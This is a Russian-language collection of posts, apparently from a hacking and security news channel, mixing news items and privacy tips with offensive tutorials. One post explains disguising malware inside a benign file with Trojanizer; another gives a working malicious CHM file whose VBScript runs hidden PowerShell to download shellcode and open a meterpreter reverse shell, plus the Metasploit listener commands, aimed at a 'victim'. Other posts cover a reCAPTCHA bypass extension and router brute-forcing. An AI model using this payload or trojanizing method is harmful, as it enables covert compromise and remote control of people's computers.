​​Склейка зловреда с безопасным файлом

Про склейку вируса с обычным файлом посредством SFX архива знают многие, однако вручную проводить этот процесс довольно неудобно. Нужно подготовить BAT файл, который правильно запустит остальные компоненты архива, настроить сам архив и т.д. Куда проще это делается с помощью программы Trojanizer.

Установка

Скачиваем репозиторий

 clone https://github.com/r00t-3xp10it/trojanizer.git

Переходим в созданную папку и запускаем утилиту


При первом запуске Trojanizer установит необходимые зависимости. Если при этом процессе появятся ошибки и некоторые комплектующие не удастся установить, то это можно сделать вручную. Вот все необходимые вспомогательные программы: Wine Program Files, WinRAR Software и Zenity.

Использование

После установки зависимостей и непосредственного запуска программы откроется первое окно, в котором необходимо выбрать вирус.

Во второй форме, нужно соответственно выбрать программу, с которой будет производиться склейка.

После чего в соответствующих окнах вводим название SFX архива и выбираем иконку.

Готово. Последнее окно покажет путь до сгенерированного файла

#вирусы #хакинг

​​SPARTA. Программа для пентеста с графическим интерфейсом

SPARTA это предустановленная в Kali Linux утилита для тестирования сетевой инфраструктуры на проникновение. В отличие от подобных фреймворков SPARTA имеет графический интерфейс, что значительно упрощает процесс пентеста новичкам. Рассмотрим её подробнее.

Установка

Как уже было сказано ранее, SPARTA предустановлена в Kali, однако в случае её отсутствия, утилиту можно установить командой

 clone https://github.com/secforce/sparta.git

Предварительно установив необходимые зависимости: Nmap, Hydra и CutyCapt.

Использование

Открыть программу можно введя в терминале sparta.

Откроется окно, в левой панели которого можно добавить ip адрес, или их диапазон, для сканирования.

Сразу же после добавление начнется сначала сканирование nmap на открытые порты.

По мере сканирования при обнаружении портов 80 или 443 в процесс включится nikto, который произведет аудит развернутого на хосте вебприложения.

По мере завершения сканирования, в правой части окна программы вы увидите списком открытые порта каждого хоста с информацией об установленных на них сервисах.

Через SPARTA можно также запускать брутфорс роутеров, админ панелей камер видеонаблюдения и т.д.

​​Роскомнадзор опубликовал пирамиду цифровых угроз

Федеральная служба по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) опубликовала в среду «пирамиду современных взаимосвязанных сетевых угроз, вызванных применением цифровых технологий на семи уровнях информационного пространства».

Семь уровней, по классификации Роскомнадзора, от основания пирамиды до вершины, это сетевое оборудование; маршрутизация; обработка данных; сервисы; вредоносная информация; общественно-опасная информация; фейки, цензура.
На каждом уровне, кроме верхнего, отдельно выделяются источники угроз и собственно угрозы.

Как поясняет ведомство, в основе пирамиды лежат угрозы сетям связи, интернет-маршрутизации и конфиденциальности данных. На вершине — контентные и смысловые угрозы, связанные общественным сознанием.

#новости

​​Вирус в CHM файле

HTMLHelp (CHM) - это формат файлов Windows выпущенный в 1997 году, представляет из себя комплекс сжатых HTML страниц и используется для предоставления различной информации пользователям программ, к примеру.

В данные файлы можно интегрировать VBScript или JavaScript код, что открывает возможность для создания вредоносного CHM файла, путем добавления в разметку кодового блока с пейлоадом, чем мы сегодня и займемся.

Создание вредоносного файла

Для начала скачаем компилятор htm2chm. С помощью него мы сможем создавать CHM файлы из обычных HTML страниц.

Далее создаем .html файл, со следующим кодом

 
   <body> 
      <script language="VBScript"> 
         Set cmd = CreateObject("wscript.shell") 
         cmd.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost <ip адрес> -lport <порт> -force" 
      </script> 
   </body> 
</html>

Подставляем нужные значения ip адреса и порта, после чего компилируем файл. Открываем htm2chm, нажимаем "Compiler", в поле Folder выбираем папку с созданным файлом, жмем "Start".

Проведение атаки

Перед запуском зараженного файла на ПК жертвы необходимо подготовить meterpreter.

Прописываем в терминале Kali Linux ряд команд поочередно

 -q 
use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_https 
set LHOST <ip адрес>
set LPORT <порт>

Подставляем нужные значения, и как только на целевом ПК откроется вредоносный файл, в терминал моментально прилетит открытая сессия.

#хакинг #вирусы

​​Приложение МВД может получить доступ к контактам пользователей

МВД объявило тендер на доработку мобильного приложения 4 февраля — победитель будет объявлен 1 марта. Он должен интегрировать модуль «Антимошенник» для распознавания звонков с мошеннических номеров.

Как следует из тендерной документации, с которой ознакомился «Коммерсант», приложению потребуется доступ к телефонной книге пользователя. Модуль будет соединяться с информационной системой полиции через сторонний сервис. При звонке с неизвестного номера приложение будет сопоставлять его со списком мошеннических номеров правоохранителей и предупредит в случае совпадения.

Инициатива МВД уменьшит объем телефонного мошенничества, признает директор центра Solar appScreener компании «Ростелеком-Солар» Даниил Чернов. Но эксперт недоумевает, зачем приложению, обрабатывающему только входящие вызовы, доступ ко всем контактам телефона. В этом случае оно может работать как скандальный сервис Get Contact, обещавший пользователю показать, как он записан в телефонных книгах разных людей, но в реальности собиравший базу номеров.

Инициатива также несет риски злоупотреблений и утечки данных, поскольку их обработка будет происходить на сторонних серверах, уточняет глава отдела информационной безопасности «СерчИнформ» Алексей Дрозд.

#новости

​​Подборка ресурсов для проверки уровня личной приватности и безопасности в сети

Проверки приватности и безопасности в сети нужно делать регулярно. Для вашего удобства мы сделали подборку с самыми полезными ресурсами из этой сферы.

▫️ Дешифроторы коротких URL-ссылок для проверки на фишинговый сайт:

http://checkshorturl.com
https://unshorten.me/
http://www.untinyurl.com

▫️ Проверка анонимности web-серфинга:

https://proxy6.net/privacy
http://proiptest.com/test/

▫️Проверка твоего Web browser на безопасность (security bugs, malware addons, etc):

https://browsercheck.qualys.com/
https://www.comss.ru/page.php?id=1408

▫️ Экспресс-онлайн проверка безопасности вашего десктопа от фишинга, уязвимостей ПО, утечки sensitive data и т.д.

http://www.cpcheckme.com/checkme/

▫️ Проверка хостовой IDS\IPS и end-point Firewall:

http://www.hackerwatch.org/probe/
http://www.t1shopper.com/tools/port-scan/

▫️ Онлайн-антивирусы:

https://www.virustotal.com/ru/
https://online.drweb.com/

▫️ Онлайн-песочницы:

https://threatpoint.checkpoint.com/ThreatPortal/emulation
https://www.vicheck.ca

#полезное

​​В Google Chrome заблокировали очень популярное расширение The Great Suspender

Google заблокировала популярное расширение The Great Suspender для браузера Chrome и удалила его из интернет-магазина Chrome. Это расширение позволяло выключать неиспользуемые вкладки, чтобы оптимизировать работу браузера.

Пользователи The Great Suspender получили оповещение о том, что расширение содержало вредоносное ПО. Сообщается, что расширение в конце 2020 года продали неизвестной компании, а она добавила в него эксплойт. Он позволял выполнять код без ведома пользователя. Данное расширение, кстати, уже удалили и из Microsoft Edge.

The Great Suspender довольно быстро стало популярным, поскольку браузер Chrome потребляет много ресурсов, а расширение позволяло заменять неактивные вкладки пустым серым экраном, экономя ресурсы. Сообщается, что после блокировки многие пользователи потеряли неиспользуемые вкладки, которые были им нужны.

#новости

​​Как безопасно открыть подозрительный софт в Windows?

Случалось ли Вам оказаться в ситуации, когда необходимо запустить какую-то программу, но Вы не совсем уверены в источнике её происхождения? А вдруг это вредонос? Или другой пример — необходимость проверить что-то на «чистой» версии Windows. Во всех подобных случаях раньше был только один выход — установить ОС на отдельную физическую или виртуальную машину и провести нужный эксперимент.

Думаю, не у всех вызывает восторг постоянно запариваться с дедиками и виртуалками. Мало кто знает, что Microsoft разработала собственную песочницу для Windows 10, которая позволяет запускать приложения в безопасном изолированном окружении.

▫️ Запустите Панель управления.
▫️Откройте раздел "Программы и компоненты".
▫️Нажмите на пункт "включение и выключение компонентов Windows".
▫️ Выберите "Песочница Windows" и нажмите "ок".
▫️ Перезагрузите ПК, в меню должно появиться приложение "Windows sandbox".
▫️Для проверки программы скопируйте файл из основной системы в песочницу.
▫️ Установите и запустите приложение в песочнице.

Даже при наличии вирусов, они не смогут проникнуть в основную систему и не нанесут значимый вред. Но учтите, что при закрытии песочницы файл сотрется!

#интересноеиполезное

​​Роскомнадзор выпустил приложение для жалоб на «запрещенную информацию»

Роскомнадзор начал бета-тестирование мобильного приложения, созданного для «ускоренной подачи жалоб граждан на запрещенную информацию». Об этом сообщается в телеграм-канале ведомства.

«Цель приложения РКН — повысить оперативность удаления из Сети запрещенной информации. Помимо подачи жалобы на зловредный контент сервис позволяет отследить этапы ее рассмотрения, проверить, ограничен ли доступ к интернет-ресурсам, в том числе сокращает риски блокировки за неудаление материалов», — сказано в сообщении.

Для того, чтобы оставить жалобу, пользователям будет необходимо зайти через свой аккаунт на сайте «Госуслуги».

Телеграм-канал «ЗаТелеком» сообщает, что вскоре после публикации релиза приложение перестало работать. У корреспондента «Медиазоны» на момент публикации новости проблем с работой приложения не было.

#новости

​​Как создать QR-код с логотипом?

Принято считать, что QR-код используют большие компании и бренды, но это не так. Любой человек может создать персонализированный QR-код — это легко и быстро, кроме того не потребует больших вложений.

▫️QR Code Monkey—  популярный бесплатный генератор QR-кода. Для его создания вам достаточно сделать несколько простых шагов

▫️Unitag — это еще одна программа создания QR-кода, которая предоставляет возможность создавать, управлять и отслеживать коды с пользовательскими цветами и логотипами.

▫️Qrcode-pro — этот генератор также предлагает широкую цветовую палитру для кода и возможность добавления логотипа. Механизм создания похож на другие сервисы из подборки, но функционал немного урезан.

#полезное

​​Арестована хак-группа, промышлявшая подменой SIM и «заработавшая» на этом миллионы

Британское Национальное агентство по борьбе с преступностью сообщило, что в начале текущей недели правоохранительные органы Англии и Шотландии арестовали восемь человек, которые занимались подменой SIM-карт и похищали деньги у американских знаменитостей и богатых людей. Часто атаки группы затрагивали известных спортсменов, музыкантов и так далее.

Представители Европола добавляют, что эти аресты стали продолжением крупной операции, начавшейся на Мальте и Бельгии, где ранее были задержаны другие члены этой же преступной группы. Данное расследование началось еще в прошлом году,  после масштабного взлома Twitter, и в нем принимали участие власти США, Великобритании, Канады, Мальты и Бельгии.

По данным властей, преступники действовали по классической схеме и обманом вынуждали сотрудников американских операторов сотовой связи присвоить их SIM-карте телефонный номер знаменитости. Имея доступ к номеру жертвы, мошенники сбрасывали пароли и обходили двухфакторную аутентификацию в различных учетных записях. Суммарно такая активность принесла группировке более 100 000 000 долларов США в криптовалюте.

#новости

​​Telegram сохранял самоуничтожающиеся медиафайлы в секретных чатах

В популярном приложении для обмена сообщениями Telegram была обнаружена уязвимость в версии программы для macOS, нарушающая конфиденциальность пользователей.

Проблема была выявлена исследователем безопасности Дхираджем Мишрой в версии приложения Telegram 7.3. Ее эксплуатация позволяла получать доступ к самоуничтожающимся аудио- и видеосообщениям спустя долгое время после их исчезновения из секретных чатов.

В отличие от Signal или WhatsApp, беседы в Telegram по умолчанию не зашифрованы, за исключением случаев, когда пользователи используют секретные чаты, сохраняющая данные в зашифрованном виде даже на серверах Telegram.

#новости

​​В «Яндексе» обнаружили внутреннюю утечку данных

Служба безопасности компании «Яндекс» обнаружила внутреннюю утечку, в результате которой были скомпрометированы данные 4887 тыс. почтовых ящиков. Об этом в пятницу, 12 февраля, сообщается на сайте компании.

Как отмечается в публикации, в результате регулярной проверки выяснилось, что сотрудник компании предоставлял несанкционированный доступ в почтовые ящики пользователей.

«Это был один из трех системных администраторов, обладавших такими правами доступа, необходимыми для выполнения рабочих задач по обеспечению технической поддержки сервиса», — объяснили в пресс-службе «Яндекса».

Сообщается, что в настоящее время неавторизованный доступ в скомпрометированные ящики уже заблокирован, а все пострадавшие получили уведомления о необходимости смены пароля. Также компания уже обратилась в правоохранительные органы.

#новости

​​Facebook приступила к разработке собственных умных часов

Как узнало издание The Information, через часы можно будет общаться в самой соцсети Facebook, а также в Instagram, WhatsApp и других сервисах компании. Кроме того, в устройстве будут функции для занятия фитнесом и отслеживания состояния здоровья.

Гаджет от компании Марка Цукерберга будет подключаться к Сети через сотовую связь, независимо от смартфона. Согласно планам Facebook, пользователи смогут через устройство подсоединяться к сервисам или оборудованию медицинских компаний и фитнес-проектов, таких как Peloton Interactive, которая занимается производством тренажёров с выходом в интернет. Так они смогут получать более точные данные о своей физической активности.

Часы от Facebook будут работать на основе Android, хотя компания в будущем собирается создать собственную операционную систему для своих устройств. В 2022 году, сообщило The Information, появится первая версия устройства. Ещё через год Facebook собирается выпустить часы второго поколения.

Напоминаем вам, что ранее на Facebook подали в суд за слежку за пользователями. Компанию обвинили в незаконном подсматривании за пользователями Instagram через камеры их смартфонов.

#новости

​​Сбербанк запускает сервис по отслеживанию номеров мошенников

Сбербанк с апреля 2021 года внедрит через мобильное приложение "Сбербанк онлайн" услугу определения номеров входящих звонков от мошенников, сообщил журналистам зампредседателя правления кредитной организации Кирилл Царев.

«В ближайшем времени мы планируем внедрить возможность услуги определения, кто звонит, чтобы на этом уровне тоже бороться с кибермошенничеством, а также устанавливать дополнительные алгоритмы по возможному вычислению противоправных действий», — сказал он.

«Мы планируем, что в марте-апреле мы этот сервис (для защиты от мошеннических звонков) доразвернем, и, начиная с апреля клиенты (приложения «Сбербанк. Онлайн») начнут его получать, и он постепенно будет доступен всем», - сказал Царев.

Он добавил, что в приложении «Сбербанк.Онлайн» появится отдельный раздел, который будет посвящен безопасности пользователей.

#новости

​​iOS будет скрывать IP-адреса пользователей от Google

В грядущей iOS 14.5, которая выйдет в ближайшие месяцы, появится функция, которая перенаправит весь Safe Browsing трафик Safari через прокси-серверы, контролируемые Apple. Таким образом в компании хотят сохранить конфиденциальность пользователей и не позволить Google узнать их IP-адреса.

Сначала информация о новой функции появилась на Reddit, но вскоре эти слухи подтвердил глава отдела разработки Webkit Мацей Стаховяк (Maciej Stachowiak).

Новая функция будет работать лишь в том случае, если пользователь активировал опцию Fraudulent Website Warning («Предупреждать о мошеннических сайтах») в настройках Safari. Эта опция обеспечивает поддержку технологии Safe Browsing от Google.

Safe Browsing работает просто: проверяет любой URL-адрес, к которому пользователь пытается получить доступ, отправляя этот URL-адрес (в анонимизированном виде) на серверы Google, а затем системы компании получают доступ к сайту и сканируют его на наличие угроз. Если на сайте обнаружены малварь, фишинговые формы и другие угрозы, Google сообщает Safari пользователя, что нужно блокировать доступ к сайту и показывает полноэкранное предупреждение.

Несколько лет назад, когда в Google только запустили API Safe Browsing, компания «видела», к каким сайтам обращается пользователь. Однако потом разработчики предприняли ряд шагов для анонимизации этих данных. Тем не менее, Google по-прежнему знает IP-адрес, с которого приходит запрос на проверку Safe Browsing.

«Проблема в том, что Update API  Safe Browsing никогда не был безопасным. Его цель заключалась не в в обеспечении полной конфиденциальности для пользователей, а скорее в ухудшении качества данных, которые собирают провайдеры», — еще в 2019 году писал известный криптограф и профессор университета Джонса Хопкинса Мэтью Грин (Matthew Green).

Новая функция Apple будет передавать все запросы Safe Browsing через собственный прокси-сервер Apple, и в результате все они будут выглядеть как поступающие с одного и того же IP-адреса.

#новости

​​Депутаты приняли закон о блокировке сотовой связи в колониях

Госдума приняла законопроект о блокировке сотовой связи в российских колониях. Об этом сообщает ТАСС.

Депутаты приняли документ в третьем, окончательном чтении. В нем предлагается операторам отключать от обслуживания сотовые номера, которые используются в СИЗО и колониях находящимися там заключенными. Блокировка будет проводиться по письменному решению должностных лиц Федеральной службы исполнения наказаний (ФСИН).

В настоящее время в местах лишения свободы заключенных запрещено пользоваться средствами связи. Однако это запрет часто нарушается. Так, в 2018 году в колониях и СИЗО изъяли 56 тысяч гаджетов. За их незаконную передачу арестантам задержали пять тысяч человек.

Авторы законопроекта депутаты Павел Крашенинников, Василий Пискарев и Александр Хинштейн указывали, что заключенные используют сотовую связь для мошенничеств, а также других противоправных действий, таких как давление на свидетелей, и руководство находящимися на свободе участниками преступных групп.

#новости

​​Google Chrome станет использовать меньше оперативной памяти в Windows 10 и Android

Согласно нескольким коммитам стало известно, что Google работает над поддержкой «PartitionAlloc-everywhere», чтобы улучшить производительность Chrome на Windows 10, Android, Linux и, возможно, на других платформах.

PartitionAlloc-everywhere для Chrome позволит браузеру запускаться быстрее, быстрее загружать внутренние страницы и предложит улучшенное управление ресурсами (уменьшение использования ОЗУ).

Google начала работать над этой функцией в прошлом году, и теперь она распространяется на тех, кто участвует в бета-канале Chrome для Android и Windows. Google также переносит PartitionAlloc в Linux, но в настоящее время у него есть проблемы, и неясно, когда он будет включен в стабильном канале.
«Переключитесь на PartitionAlloc в Linux. Это уже используется по умолчанию для Windows и Android, и на обеих платформах идет бета-версия. Тем не менее, проблемы в Linux могут остаться», – отметил инженер Google в сообщении об ошибке Chromium.
В другом эксперименте компания Google заметила, что объединение обычных и выровненных разделов может уменьшить использование памяти и способствовать повышению производительности.

Помимо Windows 10 и Linux, Google также тестирует PartitionAlloc-Everywhere для Android. Согласно экспериментам Google, это выигрыш с точки зрения памяти, производительности и стабильности, за исключением среднего размера графического процессора, который немного регрессирует.

Прошлогоднее обновление также улучшило производительность Chrome за последние годы благодаря множеству внутренних улучшений.

Как и Google, Microsoft также изучает новые идеи по сокращению использования памяти Edge. Например, в Edge недавно была добавлена ​​поддержка спящих вкладок, которая направлена ​​на сокращение использования памяти неактивными вкладками без потери данных.

#новости

​​Браузер Brave раскрывал onion-адреса в DNS-трафике

С помощью режима Tor пользователи браузера Brave могут получить доступ к onion-сайтам в приватном окне без необходимости устанавливать дополнительное программное обеспечение. Оказалось, что при использовании этого режима данные сайтов .onion остаются в DNS-трафике обозревателя. Об этом сообщил независимый исследователь, работающий в сфере информационной безопасности, который пожелал сохранить конфиденциальность.

Согласно имеющимся данным, проблема заключается в том, что при использовании режима Tor браузер отправляет запросы доменам .onion через публичные DNS-преобразователи, а не через узлы сети Tor. Сначала результаты исследования оспаривались, но позднее проблему подтвердили другие специалисты, работающие в сфере информационной безопасности.

Источник отмечает, что риски, связанные с DNS-утечками, представляют большую угрозу конфиденциальности, поскольку из-за них в журналах DNS-серверов остаются следы посещаемых пользователями Brave веб-страниц. Представители компании Brave Software, которая является разработчиком браузера Brave, пока никак не комментируют данный вопрос.

Последние несколько лет разработчики создавали один из наиболее конфиденциальных веб-обозревателей, который в настоящее время уступает в этом показателе разве что браузеру Tor. Поскольку разработчики Brave вряд ли захотят испортить репутацию своего детища, можно предположить, что исправление бага, приводящего к DNS-утечкам, будет выпущено в ближайшее время. В настоящее время патч для исправления бага уже тестируется в бета-версиях Brave Nightly. Предполагается, что для стабильных версий обозревателя он станет доступен в ближайшие недели.

#новости

​​Как обойти reCapcha?

ReCapcha — это важный инструмент, который позволяет легко и быстро защитить сайты от регистрирующихся ботов, блог-посты — от бесчисленных спамерских комментов и так далее. Без капчи умельцы смогли бы, к примеру, накручивать количество голосов в голосованиях или писать кучу рекламных комментариев с помощью программных роботов.


Обойти эту технологию, как выяснилось — не так уж и сложно. Для обхода рекапчи появилась утилита Buster: Captcha Solver for Humans - единственное в своем роде расширение для браузера, которое за секунду решит любую reCAPTCHA.

1. На странице Buster в Github  выбираем наш браузер
2. Нас перенесет в расширения браузера, нажимаем "установить"
3. Нажимаем на I'm not a robot, потом на иконку желтого человечка - Готово!

▫️https://github.com/dessant/buster

#полезное